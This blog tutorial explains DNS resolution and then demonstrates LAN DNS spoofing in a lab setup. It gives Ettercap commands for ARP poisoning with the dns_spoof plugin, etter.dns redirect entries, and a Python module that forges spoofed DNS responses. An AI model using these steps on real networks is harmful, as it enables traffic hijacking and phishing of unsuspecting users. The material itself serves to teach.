Monday, July 11, 2016

DNS – What It is and How to Spoof It

DNS stands for Domain Name System. It translates the host names you type into the address bar into the IP addresses the network actually uses.

When you enter www.google.com into the address bar, the name is first resolved to its IP address, and only then is the connection established.

Here’s how the process goes:

1. You enter the hostname www.xyz.com into the address bar.

2. Your computer looks for the name in its local DNS cache (and the hosts file). If it is not found, a DNS query is sent out.

3. The query goes to a recursive nameserver, usually the one run by your ISP (or a public resolver you configured). It has a cache of its own.

4. If the recursive server does not have the answer cached, it queries a root nameserver.

5. The root nameserver reads the name from right to left, looks at the TLD (.com, .in, .us) and refers the recursive server to the nameservers for that TLD.

6. The recursive server then sends the query to the top level domain (TLD) nameserver.

7. The TLD nameserver looks at the next label to the left (xyz) and refers the recursive server to the nameservers for that specific domain.

8. Finally, the query reaches the authoritative DNS servers for the domain. These hold everything there is to know about it, in the form of DNS records (A, MX and so on). The recursive server retrieves the record, caches it for the record's TTL and hands it back to you.
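The walk from the root to the authoritative server, plus the caching in step 8, as an added example written for this page (it is not part of the original post). The servers, zones and addresses below are constructed stand-ins for the real root, .com and xyz.com nameservers; real resolvers also have to resolve the names of the servers they are referred to (glue records), which is skipped here.

```python
"""Iterative DNS resolution, simulated offline.

Added example, not from the original post. ROOT, TLD_COM and AUTH_XYZ are a
constructed stand-in for the real root, .com and xyz.com nameservers; the
server names and addresses are made up (203.0.113.0/24 is a documentation
range). Each server either refers the resolver to a more specific server or
returns the final A record with its TTL.
"""
import time

# Constructed zone data. ("referral", server) means "ask that server";
# ("answer", ip, ttl) is the authoritative A record.
ROOT = {"com.": ("referral", "a.gtld-servers.net.")}
TLD_COM = {"xyz.com.": ("referral", "ns1.xyz.com.")}
AUTH_XYZ = {"www.xyz.com.": ("answer", "203.0.113.10", 300),
            "mail.xyz.com.": ("answer", "203.0.113.25", 300)}

SERVERS = {"root.": ROOT,                 # server name -> what it serves
           "a.gtld-servers.net.": TLD_COM,
           "ns1.xyz.com.": AUTH_XYZ}


def zones_right_to_left(name):
    """'www.xyz.com.' -> ['com.', 'xyz.com.', 'www.xyz.com.']
    (steps 5 and 7 of the post: servers read the name from the right)."""
    parts = name.rstrip(".").split(".")
    return [".".join(parts[i:]) + "." for i in range(len(parts) - 1, -1, -1)]


def ask(server, qname):
    """One query to one server: it answers with the most specific entry it
    has for the name, or None if it knows nothing about it."""
    data = SERVERS[server]
    best = None
    for zone in zones_right_to_left(qname):
        if zone in data:
            best = data[zone]
    return best


class RecursiveResolver:
    """The ISP-side recursive server: walks root -> TLD -> authoritative and
    caches the answer for its TTL."""

    def __init__(self):
        self.cache = {}   # qname -> (ip, expiry time)
        self.trace = []   # which servers were asked, for inspection

    def resolve(self, qname, now=None):
        now = time.time() if now is None else now
        qname = qname.rstrip(".") + "."
        hit = self.cache.get(qname)
        if hit and hit[1] > now:
            self.trace.append(f"cache hit {qname}")
            return hit[0]
        server = "root."
        for _ in range(10):                   # bound the referral chain
            self.trace.append(f"ask {server} for {qname}")
            result = ask(server, qname)
            if result is None:
                raise LookupError(f"{qname}: no such name")
            if result[0] == "answer":
                _, ip, ttl = result
                self.cache[qname] = (ip, now + ttl)
                return ip
            server = result[1]
        raise LookupError("referral loop")


if __name__ == "__main__":
    r = RecursiveResolver()
    print(r.resolve("www.xyz.com"))       # walks root -> .com -> xyz.com
    print(r.resolve("www.xyz.com"))       # second time: served from cache
    print("\n".join(r.trace))
```

Run it twice for the same name and the trace shows three queries the first time and a cache hit the second; once the 300 second TTL has passed the walk is repeated. That cache is also why a spoofing attack on the LAN only works for names the victim has not recently resolved.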

 

Common DNS records:

A = forward lookup: hostname to IPv4 address (AAAA is the IPv6 equivalent)

MX = mail exchange record: which hosts accept mail for the domain

PTR = reverse lookup: IP address back to a hostname

 

What’s a nameserver?

A server that is permanently reachable on the internet and answers DNS queries: for the zones it is responsible for, it maps domain names to IP addresses and other records.

 

What’s Ettercap?

Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN. It can sniff live connections, filter traffic on the fly and is used for network protocol analysis and security auditing.

 

Spoofing DNS using Ettercap

The victim will try to connect to msn.com and will instead see a webpage hosted by the attacker.

Scenario: two machines on the same LAN – Kali Linux (the attacker, 192.168.1.8 in this example) and Windows 8 (the victim).

On Kali Linux

1. Locate the file etter.dns:

#locate etter.dns

The file is under /etc/ettercap.

Open it with the nano editor and scroll down until you see the comment line

wildcards in PTR are not allowed

Below it there are example entries; add your own in the same format, for instance

www.msn.com A 192.168.1.8

where A is the record type and the IP is that of your Kali Linux machine. Wildcards are accepted in A entries (for example *.msn.com A 192.168.1.8 catches every host under the domain) but, as the comment says, not in PTR entries.

Save and exit.

2. Enable IP forwarding so that traffic the victim sends through you still reaches the gateway. Go to

/proc/sys/net/ipv4

where there is a file by the name ip_forward. Open it with nano and you'll find that it's set to 0; make it 1, then save and exit. The usual way to do the same thing from the shell is

# echo 1 > /proc/sys/net/ipv4/ip_forward

Either way the setting is lost on reboot. Note that Ettercap's own ARP poisoning forwards the victim's packets itself and switches this kernel setting off while it runs (unless started with -u), so this step is harmless but is not what keeps the victim online.

3. Start Ettercap with the dns_spoof plugin:

# ettercap -T -q -M arp:remote -P dns_spoof //

-T is text mode, -q keeps it quiet, -M arp:remote does the ARP poisoning and -P dns_spoof loads the plugin, which answers DNS queries it sees with the entries from etter.dns. With an empty target specification (//) every host on the LAN is poisoned; to hit only the victim, give its IP and the gateway's IP as the two targets (/victim-ip// /gateway-ip//). On Ettercap 0.8 and later the target format gained an IPv6 field, so the all-hosts wildcard is written /// instead of //.

(enter q to quit)

(ettercap --help lists the options)

Go to your Windows machine and ping www.msn.com.

You'll see that the reply comes from 192.168.1.8 – the Kali machine – instead of msn.com's IP. If Windows still has the real address cached from an earlier lookup, no query goes out and nothing is spoofed; clear the cache first with ipconfig /flushdns.

Similarly, if you enter www.msn.com in the browser on Windows, you are sent to the Kali Linux machine, where you can host your own page for malicious or non-malicious intent. This works because a plain DNS query carries no authentication: the client accepts the first response whose transaction ID and question match, and the poisoning puts Kali in a position to see the query and answer before the real server does.

All of this will make much more sense once you are familiar with ARP spoofing, which is what puts the Kali machine between the victim and the gateway in the first place.
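What the dns_spoof plugin does with an etter.dns entry once it sees a query, as an added example written for this page (it is not part of the original post and not Ettercap's code): read etter.dns-style lines, match the queried name against them, wildcards included, and forge a response carrying the victim's own transaction ID and question with an answer pointing at the attacker. The ETTER_DNS text, the hostnames and the query are constructed here; 192.168.1.8 is the Kali address from the post.

```python
"""What Ettercap's dns_spoof plugin does, reproduced in Python.

Added example, not from the original post and not Ettercap's own code. It
reads etter.dns-style lines, and for a captured A query (here constructed
with build_query; in the real attack it is sniffed off the wire after ARP
poisoning) it forges a response that carries the same transaction ID and
question but an answer pointing at the attacker. The ETTER_DNS text and
hostnames are made up; 192.168.1.8 is the Kali address used in the post.
"""
import fnmatch
import socket
import struct

ETTER_DNS = """\
# constructed etter.dns fragment: comments and blank lines are ignored
www.msn.com      A    192.168.1.8
*.msn.com        A    192.168.1.8
mail.msn.com     MX   192.168.1.8
"""


def parse_etter_dns(text):
    """Return (pattern, type, ip) entries; exact names are sorted before
    wildcard patterns so the more specific entry wins."""
    entries = []
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) != 3:
            continue
        name, rtype, ip = parts
        entries.append((name.lower(), rtype.upper(), ip))
    entries.sort(key=lambda e: "*" in e[0])
    return entries


def lookup_spoof(entries, qname, rtype="A"):
    """The IP to answer with, or None if no entry covers the name."""
    qname = qname.lower().rstrip(".")
    for pattern, rt, ip in entries:
        if rt == rtype and fnmatch.fnmatchcase(qname, pattern):
            return ip
    return None


def encode_name(name):
    """'www.msn.com' -> length-prefixed labels ending in a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii")
                    for l in name.rstrip(".").split(".")) + b"\x00"


def decode_name(pkt, off):
    """Decode an uncompressed name at pkt[off:]; return (name, next offset)."""
    labels = []
    while pkt[off]:
        n = pkt[off]
        labels.append(pkt[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1


def build_query(txid, qname, qtype=1):
    """A client query as it leaves the victim: 12-byte header, one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(pkt):
    txid, = struct.unpack("!H", pkt[:2])
    qname, off = decode_name(pkt, 12)           # question follows the header
    qtype, = struct.unpack("!H", pkt[off:off + 2])
    return txid, qname, qtype, pkt[12:off + 4]  # raw question incl. type/class


def forge_response(query_pkt, entries, ttl=3600):
    """The spoofed reply, or None if no etter.dns entry matches the name.
    The client accepts it because txid and question match its own query."""
    txid, qname, qtype, question = parse_query(query_pkt)
    if qtype != 1:                              # only A queries handled here
        return None
    ip = lookup_spoof(entries, qname, "A")
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA, 1 answer
    answer = (b"\xc0\x0c"                       # pointer to the name at offset 12
              + struct.pack("!HHIH", 1, 1, ttl, 4)   # type A, class IN, TTL, RDLENGTH
              + socket.inet_aton(ip))
    return header + question + answer


def read_answer(resp):
    """Pull (txid, ip, ttl) back out of a forged response, for checking."""
    txid, = struct.unpack("!H", resp[:2])
    _, off = decode_name(resp, 12)
    off += 4                                    # skip qtype, qclass
    _, _, ttl, rdlen = struct.unpack("!HHIH", resp[off + 2:off + 12])
    return txid, socket.inet_ntoa(resp[off + 12:off + 12 + rdlen]), ttl


if __name__ == "__main__":
    entries = parse_etter_dns(ETTER_DNS)
    q = build_query(0x1234, "www.msn.com")
    print(read_answer(forge_response(q, entries)))
```

Nothing in the forged packet is secret: the transaction ID and the question are copied straight from the query the attacker can see, which is the whole reason being on the path (via ARP poisoning) is enough. A query for a name with no entry gets no forged reply and is forwarded untouched, so the rest of the victim's browsing keeps working and the attack stays inconspicuous.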
